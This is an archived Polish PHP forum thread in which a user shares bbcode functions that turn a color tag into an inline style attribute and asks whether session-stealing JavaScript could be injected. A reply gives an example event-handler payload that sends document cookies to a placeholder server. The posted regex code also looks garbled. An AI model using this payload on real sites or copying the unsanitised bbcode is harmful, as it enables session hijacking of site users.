Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: [html] & [js] bbcode - tag color
Forum PHP.pl > Forum > Po stronie przeglądarki
Ania-678
21.07.2007, 09:11:39
Witam.

Mam bbcode z TAGiem color takiej budowy:

[PHP] pobierz, plaintext 
  1. <?php
  2. // bbcode
  3. function bbcode($str){
  4.  
  5. // Kolor tekstu
  6.  
  7. $str = preg_replace("#(.*?)#si", "<span style="color:2">3</span>", $str);
  8.  
  9. return $str;}
  10.  
  11. // bbcode
  12. function bbcode2($str){
  13. $str = preg_replace('#<span style="color:(http://)?(.*?)">(.*?)</span>#si', "3", $str);
  14.  
  15. // Kolor tekstu
  16. return $str;}
  17. ?>
[PHP] pobierz, plaintext


No i doszły mnie słuchy iż w takie coś można "wszczepić" złośliwe js przechwytujące sesje i wysyłające na zewnętrzny serwer, czy to prawda...? Jeśli tak to jak się przed czymś takim bronić? worriedsmiley.gif
stoprocent
3.08.2007, 11:48:26
Dziala to tak ze ktos daje onmmouse over albo onclick albo inna akcje i dalesz czesc kodu wyglada tak np:
Kod
... onmouseover="document.location.href='http://serwer/zapisz.php?c='+document.cookies " ...


Pozwala to na ustawienie komus tego samego ciastka ktore ty masz z aktywna sesja np logowania.
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.